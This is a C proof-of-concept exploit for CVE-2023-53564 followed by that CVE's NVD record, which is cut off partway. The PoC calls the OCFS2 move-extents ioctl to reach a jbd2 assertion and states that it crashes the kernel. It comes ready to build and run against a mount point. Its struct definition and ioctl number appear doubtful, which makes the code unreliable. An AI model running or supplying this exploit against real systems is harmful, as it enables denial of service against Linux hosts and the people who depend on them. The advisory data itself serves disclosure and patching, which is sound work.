CVE-2023-53564

// CVE-2023-53564 PoC - Trigger OCFS2 defrag path jbd2 ASSERT // This PoC triggers the vulnerability by performing defragmentation // on an OCFS2 filesystem, which causes a kernel ASSERT failure in jbd2. // Build: gcc -o poc_cve_2023_53564 poc_cve_2023_53564.c // Usage: ./poc_cve_2023_53564 /mnt/ocfs2_mount_point #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <sys/stat.h> // OCFS2 ioctl definitions for move extents (defragmentation) #ifndef OCFS2_IOC_MOVE_EXTENTS #define OCFS2_IOC_MOVE_EXTENTS _IOW(0xF7, 6, struct ocfs2_move_extents) #endif struct ocfs2_move_extents { unsigned int me_start; /* Starting offset in clusters */ unsigned int me_len; /* Number of clusters to move */ unsigned int me_goal; /* Destination cluster */ unsigned int me_flags; /* Flags for the operation */ unsigned int me_count; /* Number of extents moved */ }; int main(int argc, char *argv[]) { int fd; struct ocfs2_move_extents me; const char *mount_point; if (argc < 2) { fprintf(stderr, "Usage: %s <ocfs2_file>\n", argv[0]); return 1; } mount_point = argv[1]; // Open a file on the OCFS2 filesystem fd = open(mount_point, O_RDWR); if (fd < 0) { perror("open"); fprintf(stderr, "Make sure the target is on an OCFS2 filesystem\n"); return 1; } // Setup move_extents parameters to trigger defragmentation memset(&me, 0, sizeof(me)); me.me_start = 0; // Start from the beginning me.me_len = 1; // Move 1 cluster me.me_goal = 1; // Move to cluster 1 me.me_flags = 0; // No special flags me.me_count = 0; printf("Triggering OCFS2 defrag path...\n"); printf("This should trigger jbd2 ASSERT and crash the kernel\n"); // Call the ioctl to trigger the vulnerable code path: // ocfs2_ioctl_move_extents -> ocfs2_move_extents -> ocfs2_defrag_extent // -> __ocfs2_move_extent -> ocfs2_journal_access_di // -> ocfs2_split_extent (calls jbd2_journal_restart) // -> ocfs2_journal_dirty (triggers jbd2 ASSERT) int ret = ioctl(fd, OCFS2_IOC_MOVE_EXTENTS, &me); if (ret < 0) { perror("ioctl"); // On vulnerable kernels, the kernel will crash before returning printf("ioctl failed (kernel may have crashed)\n"); } else { printf("ioctl returned: %d, me_count: %u\n", ret, me.me_count); } close(fd); return 0; }

{"cve": {"id": "CVE-2023-53564", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:51.870", "lastModified": "2026-03-21T00:39:51.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix defrag path triggering jbd2 ASSERT\n\ncode path:\n\nocfs2_ioctl_move_extents\n ocfs2_move_extents\n ocfs2_defrag_extent\n __ocfs2_move_extent\n + ocfs2_journal_access_di\n + ocfs2_split_extent //sub-paths call jbd2_journal_restart\n + ocfs2_journal_dirty //crash by jbs2 ASSERT\n\ncrash stacks:\n\nPID: 11297 TASK: ffff974a676dcd00 CPU: 67 COMMAND: \"defragfs.ocfs2\"\n #0 [ffffb25d8dad3900] machine_kexec at ffffffff8386fe01\n #1 [ffffb25d8dad3958] __crash_kexec at ffffffff8395959d\n #2 [ffffb25d8dad3a20] crash_kexec at ffffffff8395a45d\n #3 [ffffb25d8dad3a38] oops_end at ffffffff83836d3f\n #4 [ffffb25d8dad3a58] do_trap at ffffffff83833205\n #5 [ffffb25d8dad3aa0] do_invalid_op at ffffffff83833aa6\n #6 [ffffb25d8dad3ac0] invalid_op at ffffffff84200d18\n [exception RIP: jbd2_journal_dirty_metadata+0x2ba]\n RIP: ffffffffc09ca54a RSP: ffffb25d8dad3b70 RFLAGS: 00010207\n RAX: 0000000000000000 RBX: ffff9706eedc5248 RCX: 0000000000000000\n RDX: 0000000000000001 RSI: ffff97337029ea28 RDI: ffff9706eedc5250\n RBP: ffff9703c3520200 R8: 000000000f46b0b2 R9: 0000000000000000\n R10: 0000000000000001 R11: 00000001000000fe R12: ffff97337029ea28\n R13: 0000000000000000 R14: ffff9703de59bf60 R15: ffff9706eedc5250\n ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018\n #7 [ffffb25d8dad3ba8] ocfs2_journal_dirty at ffffffffc137fb95 [ocfs2]\n #8 [ffffb25d8dad3be8] __ocfs2_move_extent at ffffffffc139a950 [ocfs2]\n #9 [ffffb25d8dad3c80] ocfs2_defrag_extent at ffffffffc139b2d2 [ocfs2]\n\nAnalysis\n\nThis bug has the same root cause of 'commit 7f27ec978b0e (\"ocfs2: call\nocfs2_journal_access_di() before ocfs2_journal_dirty() in\nocfs2_write_end_nolock()\")'. For this bug, jbd2_journal_restart() is\ncalled by ocfs2_split_extent() during defragmenting.\n\nHow to fix\n\nFor ocfs2_split_extent() can handle journal operations totally by itself. \nCaller doesn't need to call journal access/dirty pair, and caller only\nneeds to call journal start/stop pair. The fix method is to remove\njournal access/dirty from __ocfs2_move_extent().\n\nThe discussion for this patch:\nhttps://oss.oracle.com/pipermail/ocfs2-devel/2023-February/000647.html"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0", "versionEndExcluding": "4.14.308", "matchCriteriaId": "392137B6-D192-413F-B4A0-820800431495"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.276", "matchCriteriaId": "C902FC54-DDBD-4DA6-BFEF-26889A267464"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.235", "matchCriteriaId": "13DD5E68-8CB4-46EE-9A8F-C7F6C1A84430"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.173", "matchCriteriaId": "4D810CFB-B7C5-493C-B98A-0D5F0D8A47B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.99", "matchCriteriaId": "5B8B2AC9-2F31-4A0F-96F5-7E26B50B27BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.16", "matchCriteriaId": "0FD95FDA-6525-4B13-B3FB-49D9995FD8ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.3", "matchCriteriaId": "88C67289-22AD-4CA9-B202-5F5A80E5BA4B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2c559b3ba8e0b9e3c4bb08159a28ccadc698410f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/33665d1042666f2e5c736a3df1f453e31f030663", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, ... (truncated)